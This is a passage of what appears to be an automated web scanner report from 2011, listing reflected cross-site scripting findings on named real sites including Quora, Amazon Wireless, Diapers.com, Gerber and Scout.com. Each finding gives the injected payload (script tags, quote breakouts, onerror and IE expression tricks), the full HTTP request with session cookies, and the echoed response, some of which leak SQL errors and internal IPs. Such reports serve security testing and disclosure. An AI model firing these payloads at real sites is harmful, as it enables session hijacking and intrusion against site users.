Host:   http://t.tellapart.com
Path:   /hif

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8273"%3balert(1)//f5bb147caf8 was submitted in the p parameter. This input was echoed as d8273";alert(1)//f5bb147caf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hif?p=UL4d6RadJCzeLcSN6Nimj83ZxzkLAAEAAAAQjczOYeYJ5CHvHZ8aM3uksQsAAgAAABAb3OJ5V5U4zYp2fncPa3U_CgADAAABMxnTtPoPAAQLAAAABQAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDgAAAADMTA1CwAFAAAADGZnNExteEpVMlhmOAA=d8273"%3balert(1)//f5bb147caf8 HTTP/1.1
Host: t.tellapart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.soap.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: AWSELB=E31F5987121C4E93C56CFAE300CB3FAA8458B8275ED54EFB1FBFC3259C68A4A477202DDBEDE8C188F9CF642883A884D0361F7ACB55D28CA1B6DB6FB66138191813061DE56C; __cmbGU=ABJeb1-evaU1EoLaXkoak4YubtmzWgd_U6nJji373qb7lNuzXyaiTa8euJhPR-u_PNmVVsSxUSxbSK2x6ghRMwpZBR-si5yhEA; drapt=ABJeb19tCQzbPPN2Hmdg4Db2KUI1aganqNZrIr8jeyXF8CEsgJK4I7-LYm6vHYoSsgAz-bPLhS38ptdzi7pRrkAIYV1-GnW7ezHr1Y2OOXbMUIlkWVDSemiAWuGA-6Xz7lmowMB3VX4r9axBieRARcFGihmMe6hwIvV5xVHzHUflalLXTnQPZII
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Date: Wed, 19 Oct 2011 01:38:03 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: TAFE
Set-Cookie: tap=jdehhngEWQtABINNk9KlD_3duw0PAAEMAAAABQsAAQAAAAI5OQoAAwAAATMZ0_8xAAsAAQAAAAI3NQoAAwAAATMZ0_8xAAsAAQAAAAI3NAoAAwAAATMZ0_8xAAsAAQAAAAMxMDgKAAMAAAEzGdP_MQALAAEAAAADMTA1CgADAAABMxnT_zEAAA==; expires=Mon, 16-Apr-2012 01:38:03 GMT; Path=/; Domain=.tellapart.com
Connection: keep-alive
Content-Length: 4627

<html><body>
<script type="text/javascript">
// Maximum time allowed for pixels to load.
var MAX_PIXEL_LOAD_TIME = 3000;
// Ensures no more pixels are loaded after MAX_PIXEL_LOAD_TIME by removing src

...[SNIP]...
okie("__cmbPI", "UL4d6RadJCzeLcSN6Nimj83ZxzkLAAEAAAAQjczOYeYJ5CHvHZ8aM3uksQsAAgAAABAb3OJ5V5U4zYp2fncPa3U_CgADAAABMxnTtPoPAAQLAAAABQAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDgAAAADMTA1CwAFAAAADGZnNExteEpVMlhmOAA=d8273";alert(1)//f5bb147caf8");
setCookie("__cmbPD", "");
</script>
...[SNIP]...

1.11. http://tch415419.tch.www.quora.com/up/tchannel4/updates [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tch415419.tch.www.quora.com
Path:   /up/tchannel4/updates

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d4746<script>alert(1)</script>ef5cf2a010e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /up/tchannel4/updates?min_seq=97209479&channel=main-w-dep5-358787519774477018&callback=jsonp133028d827ab0179c4ad87c98d4746<script>alert(1)</script>ef5cf2a010e HTTP/1.1
Host: tch415419.tch.www.quora.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.quora.com/login/index?next=http%3A//www.quora.com/press
Cookie: m-b=j564Qu5GUoDxPWJ792vJsw==; m-s=VlplhYUqVWntoS33kQHYLw==; m-tz=300; __utma=261736717.1380011670.1318593668.1318593668.1318597632.2; __utmc=261736717; __utmz=261736717.1318597632.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=261736717.8.10.1318597632

Response

HTTP/1.1 200 OK
Content-Length: 110
Etag: "1812913ef3d8d9ec31c8687e4d78be888edadb47"
Content-Type: text/javascript; charset=UTF-8
Server: TornadoServer/1.2.1

jsonp133028d827ab0179c4ad87c98d4746<script>alert(1)</script>ef5cf2a010e({"messages": [], "min_seq": 97220147})

1.12. http://tch700182.tch.www.quora.com/up/tchannel3/updates [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tch700182.tch.www.quora.com
Path:   /up/tchannel3/updates

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 469a8<script>alert(1)</script>f5bea898fa2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /up/tchannel3/updates?min_seq=97651036&channel=main-w-dep3-375572338674840021&callback=jsonp133028d5d979eb49b513c4f68469a8<script>alert(1)</script>f5bea898fa2 HTTP/1.1
Host: tch700182.tch.www.quora.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.quora.com/signup/index
Cookie: m-b=j564Qu5GUoDxPWJ792vJsw==; m-s=VlplhYUqVWntoS33kQHYLw==; m-tz=300; __utma=261736717.1380011670.1318593668.1318593668.1318597632.2; __utmc=261736717; __utmz=261736717.1318597632.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=261736717.6.10.1318597632

Response

HTTP/1.1 200 OK
Content-Length: 110
Etag: "aec51eac97d4718ccba04f86516775f197cc02db"
Content-Type: text/javascript; charset=UTF-8
Server: TornadoServer/1.2.1

jsonp133028d5d979eb49b513c4f68469a8<script>alert(1)</script>f5bea898fa2({"messages": [], "min_seq": 97660054})

1.13. http://wireless.amazon.com/alohaCartRequest [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wireless.amazon.com
Path:   /alohaCartRequest

Issue detail

The value of the zip request parameter is copied into the HTML document as plain text between tags. The payload 17089<img%20src%3da%20onerror%3dalert(1)>487864721b767e161 was submitted in the zip parameter. This input was echoed as 17089<img src=a onerror=alert(1)>487864721b767e161 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /alohaCartRequest?appActionToken=cYQYWj2B1CbeY1pQhkj2FPL6w8HP63oj3D&appAction=detailAction&asin=B004NNVHUC&transaction=MBB_MONTH_TO_MONTH_CONTRACT&operation=ADD_DEVICE&zip=1001017089<img%20src%3da%20onerror%3dalert(1)>487864721b767e161&type=BUNDLE HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://wireless.amazon.com
X-Requested-With: XMLHttpRequest
Referer: http://wireless.amazon.com/Motorola-XOOM-Android-Verizon-Wireless/dp/B004NNVHUC/ref=sh_br_ph_2?ie=UTF8&transaction=MBB_MONTH_TO_MONTH_CONTRACT&sr=1-2-entd&qid=1318988467373
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: ubid-main=181-9895569-2816523; s_cc=true; s_sq=%5B%5BB%5D%5D; session-id=185-9282440-9117819; session-id-time=2082787201l; session-token=PaZ6L8TRm1aNiO11Nm+m6SJk7i5+ebu2g1KZlc/LuD9kku68PtY785VSLdE+MGVb4ANu/41pUn8Q/HY/IVlEGlqoijKiMLYgG0SNrqgODkyqWqyG+e3LVGvTXWQmI06G/98yG32PQdN1BjK/dZRtuCd48BUmlMV4fdRoi4ldxepoOoDCWvrXMJu3m9+0VqnqRjAHtMGxWvYYrpbpmxEfLJVDm190hP4hK6YiG5j2dBW7kKk48l5koBMlJBC59OXR
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Wed, 19 Oct 2011 01:43:54 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=181-9895569-2816523; Domain=.amazon.com; Expires=Tue, 14-Oct-2031 01:43:54 GMT; Path=/
Content-Length: 1289


{"phoneBrowseNodeId":"/b/684177011","bundleBuildStates":[{"name":"SELECT_MBB_PLAN","url":"/b/2685640011"}],"didInternalBundleChangeOccur":false,"compatibilityResult":{"isCompatible":false,"compatibilityMessage":"This phone is not available in ZIP Code 1001017089<img src=a onerror=alert(1)>487864721b767e161","compatibilityLink":"<a href=\"/b/684177011/ref=bb_br_ph_dp\">
...[SNIP]...

1.14. http://www.diapers.com/buy [freetext parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diapers.com
Path:   /buy

Issue detail

The value of the freetext request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1d07"-alert(1)-"c2642162bae was submitted in the freetext parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /buy?freetext=lptakefivef1d07"-alert(1)-"c2642162bae&viewheader=n HTTP/1.1
Host: www.diapers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.diapers.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: cmRS=&t1=1318988476673&t2=1318988478112&t3=1318988489027&lti=1318988489027&ln=&hr=/buy%3Ffreetext%3Dlptakefive%26viewheader%3Dn&fti=&fn=&ac=&fd=&uer=&fu=&pi=%20Index&ho=data.coremetrics.com/eluminate%3F&ci=90199526; NSC_ejbqfst-jnbhft-xxx=ffffffff0988dd2545525d5f4f58455e445a4a423661; cmTPSet=Y; ASP.NET_SessionId=t4jzwvagsodtab555t10imrr; NSC_ejbqfst-tjuftqfdu=ffffffff0988df3145525d5f4f58455e445a4a423660; NSC_ejbqfst-xxx-tjuftqfdu=ffffffff0988dc7445525d5f4f58455e445a4a423661; VISITOR_ID=356cb73a-75d8-4366-bbb9-ad8f71205d68; __cmbTpvTm=1381; __cmbDomTm=0; __utma=1.643781659.1318988318.1318988318.1318988318.1; __utmb=1.1.10.1318988477; __utmc=1; __utmz=1.1318988318.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SSPV=I8AAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAA; SSRT=iiqeTgE; __cmbNoFlEn=enabled; __cmbU=ABJeb1-h9ZL2uvWf0aAKQ3qgqDhFDq5LTrHezELVoGphejeL-mWmeqAARG5LX_gecd1sF3lbyLS-K-Zno-cw_eWxMajCeGlIlg; SSID=BQDxRRsOAAAAAADpKZ5OukYLAekpnk4BAAAAAAAAAAAA6SmeTgAVAAABjgEAAOkpnk4BAA; SSLB=1; SSSC=21.G5665011462000297658.1|21.398
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Wed, 19 Oct 2011 01:43:19 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SSRT=KyueTgE; path=/; domain=.diapers.com; expires=Thu, 18-Oct-2012 01:43:07 GMT
Set-Cookie: SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA; path=/; domain=.diapers.com; expires=Thu, 18-Oct-2012 01:43:07 GMT
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
P3P: CP=CAO PSA OUR
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Expires: Fri, 18 Mar 2011 17:39:13 GMT
Pragma: no-cache
RTSS: C4
Content-Length: 60486
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
mber='';
(function(){try {function d(){
var action = TellApartCrumb.makeCrumbAction("HFvqUjcldZsQ", "pv");
action.setActionAttr("PageType","Product");
action.setActionAttr("SearchQuery","lptakefivef1d07"-alert(1)-"c2642162bae");
action.setActionAttr("X-IsRepeatBuyer","Null");
action.finalize();
}var b;
if("https:"==document.location.protocol) b="https://sslt.tellapart.com/crumb.js";
else{for(var f=navigator.userAgent,
...[SNIP]...

1.15. http://www.diapers.com/buy [freetext parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diapers.com
Path:   /buy

Issue detail

The value of the freetext request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1717e"style%3d"x%3aexpression(alert(1))"77ce1a1b412 was submitted in the freetext parameter. This input was echoed as 1717e"style="x:expression(alert(1))"77ce1a1b412 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /buy?freetext=lptakefive1717e"style%3d"x%3aexpression(alert(1))"77ce1a1b412&viewheader=n HTTP/1.1
Host: www.diapers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.diapers.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: cmRS=&t1=1318988476673&t2=1318988478112&t3=1318988489027&lti=1318988489027&ln=&hr=/buy%3Ffreetext%3Dlptakefive%26viewheader%3Dn&fti=&fn=&ac=&fd=&uer=&fu=&pi=%20Index&ho=data.coremetrics.com/eluminate%3F&ci=90199526; NSC_ejbqfst-jnbhft-xxx=ffffffff0988dd2545525d5f4f58455e445a4a423661; cmTPSet=Y; ASP.NET_SessionId=t4jzwvagsodtab555t10imrr; NSC_ejbqfst-tjuftqfdu=ffffffff0988df3145525d5f4f58455e445a4a423660; NSC_ejbqfst-xxx-tjuftqfdu=ffffffff0988dc7445525d5f4f58455e445a4a423661; VISITOR_ID=356cb73a-75d8-4366-bbb9-ad8f71205d68; __cmbTpvTm=1381; __cmbDomTm=0; __utma=1.643781659.1318988318.1318988318.1318988318.1; __utmb=1.1.10.1318988477; __utmc=1; __utmz=1.1318988318.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SSPV=I8AAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAA; SSRT=iiqeTgE; __cmbNoFlEn=enabled; __cmbU=ABJeb1-h9ZL2uvWf0aAKQ3qgqDhFDq5LTrHezELVoGphejeL-mWmeqAARG5LX_gecd1sF3lbyLS-K-Zno-cw_eWxMajCeGlIlg; SSID=BQDxRRsOAAAAAADpKZ5OukYLAekpnk4BAAAAAAAAAAAA6SmeTgAVAAABjgEAAOkpnk4BAA; SSLB=1; SSSC=21.G5665011462000297658.1|21.398
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Wed, 19 Oct 2011 01:43:05 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SSRT=HSueTgE; path=/; domain=.diapers.com; expires=Thu, 18-Oct-2012 01:42:53 GMT
Set-Cookie: SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA; path=/; domain=.diapers.com; expires=Thu, 18-Oct-2012 01:42:53 GMT
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
P3P: CP=CAO PSA OUR
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Expires: Fri, 18 Mar 2011 17:39:13 GMT
Pragma: no-cache
RTSS: C4
Content-Length: 60704
Keep-Alive: timeout=5, max=248
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<meta name="description" content="Shop for lptakefive1717e"style="x:expression(alert(1))"77ce1a1b412 at Diapers.com. Free Shipping. Great Prices. Excellent Service." />
...[SNIP]...

1.16. http://www.gerberonline.com/category.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gerberonline.com
Path:   /category.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 631d5"><script>alert(1)</script>671b8487751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category.aspx?catid=171&631d5"><script>alert(1)</script>671b8487751=1 HTTP/1.1
Host: www.gerberonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q='%22%3C%2Ftitle%3E%3Cscript+src%22+urchin.js'#q='%22%3C/title%3E%3Cscript+src%22+urchin.js'&hl=en&tbo=1&prmd=imvns&source=lnt&tbs=qdr:y&sa=X&ei=V5GYTsLDMsnciALzlP3JDQ&ved=0CA4QpwUoBQ&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=43b88dc4ecfc77e7&biw=1326&bih=890
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 14 Oct 2011 19:46:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a class="currentpage" href="category.aspx?pi=1&catid=171&631d5"><script>alert(1)</script>671b8487751=1">
...[SNIP]...

1.17. http://www.scout.com/staticpages/www/24/wac/a.z [cfg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /staticpages/www/24/wac/a.z

Issue detail

The value of the cfg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 832ae'-alert(1)-'007bad23914 was submitted in the cfg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticpages/www/24/wac/a.z?cfg=response.write(268409241-22)%27832ae'-alert(1)-'007bad23914&conf=wac&fromprefetch=1&p=24&s=143 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:42:47 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 17:52:47 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2419


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Saturday, October 15, 2011 10:42:47 AM
- Source :        .Net SqlClient Data Provider
- Message :        Incorrect sy
...[SNIP]...
losed quotation mark after the character string ''.
- message :        undefined
- Number :        102
- Description :        undefined
- description :        undefined
- URL:        cfg=response.write(268409241-22)'832ae'-alert(1)-'007bad23914&conf=wac&fromprefetch=1&p=24&s=143
- Remote IP :        50.23.123.106
- Referrer URL :        
- Server IP:        192.168.20.64, SODO
- MachineName:        SODO
- Stack Trace:
at System.Data.SqlClient.Sql
...[SNIP]...

1.18. http://www.scout.com/staticpages/www/24/wac/a.z [cfg parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.scout.com
Path:   /staticpages/www/24/wac/a.z

Issue detail

The value of the cfg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1f937(a)98c961d65a0 was submitted in the cfg parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticpages/www/24/wac/a.z?cfg=response.write(268409241-22)%271f937(a)98c961d65a0&conf=wac&fromprefetch=1&p=24&s=143 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:42:50 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 17:52:50 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2414


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Saturday, October 15, 2011 10:42:50 AM
- Source :        .Net SqlClient Data Provider
- Message :        Incorrect sy
...[SNIP]...
<!--
v. 0.0.0.21898
Server Date: Saturday, October 15, 2011 10:42:50 AM
URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'1f937(a)98c961d65a0&conf=wac&fromprefetch=1&p=24&s=143
Server IP: 192.168.20.94, SCOUTWEB2
Page Execution Time: 5 ms
-->
...[SNIP]...

1.19. http://www.scout.com/staticpages/www/24/wac/a.z [conf parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.scout.com
Path:   /staticpages/www/24/wac/a.z

Issue detail

The value of the conf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1dbbe(a)18e38db57dd was submitted in the conf parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticpages/www/24/wac/a.z?cfg=response.write(268409241-22)%27&conf=wac1dbbe(a)18e38db57dd&fromprefetch=1&p=24&s=143 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:43:31 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 17:53:31 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2456


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Saturday, October 15, 2011 10:43:31 AM
- Source :        .Net SqlClient Data Provider
- Message :        Unclosed quo
...[SNIP]...
<!--
v. 0.0.0.21898
Server Date: Saturday, October 15, 2011 10:43:31 AM
URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'&conf=wac1dbbe(a)18e38db57dd&fromprefetch=1&p=24&s=143
Server IP: 192.168.20.64, SODO
Page Execution Time: 4 ms
-->
...[SNIP]...

1.20. http://www.scout.com/staticpages/www/24/wac/a.z [conf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /staticpages/www/24/wac/a.z

Issue detail

The value of the conf request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9aff4'-alert(1)-'1f9cfe2dea5 was submitted in the conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticpages/www/24/wac/a.z?cfg=response.write(268409241-22)%27&conf=wac9aff4'-alert(1)-'1f9cfe2dea5&fromprefetch=1&p=24&s=143 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:43:31 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 17:53:31 GMT
Server: Microsoft-IIS/6.0
Server: Yesler
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2480


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Saturday, October 15, 2011 10:43:31 AM
- Source :        .Net SqlClient Data Provider
- Message :        Unclosed quo
...[SNIP]...
ntax near 'response.write(268409241-22)''.
- message :        undefined
- Number :        105
- Description :        undefined
- description :        undefined
- URL:        cfg=response.write(268409241-22)'&conf=wac9aff4'-alert(1)-'1f9cfe2dea5&fromprefetch=1&p=24&s=143
- Remote IP :        50.23.123.106
- Referrer URL :        
- Server IP:        192.168.20.89, YESLER
- MachineName:        YESLER
- Stack Trace:
at System.Data.SqlClient.SqlConne
...[SNIP]...

1.21. http://www.scout.com/staticpages/www/24/wac/a.z [fromprefetch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /staticpages/www/24/wac/a.z

Issue detail

The value of the fromprefetch request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13642'-alert(1)-'b9cae18ffb4 was submitted in the fromprefetch parameter. This input was echoed unmodified in the application's response.

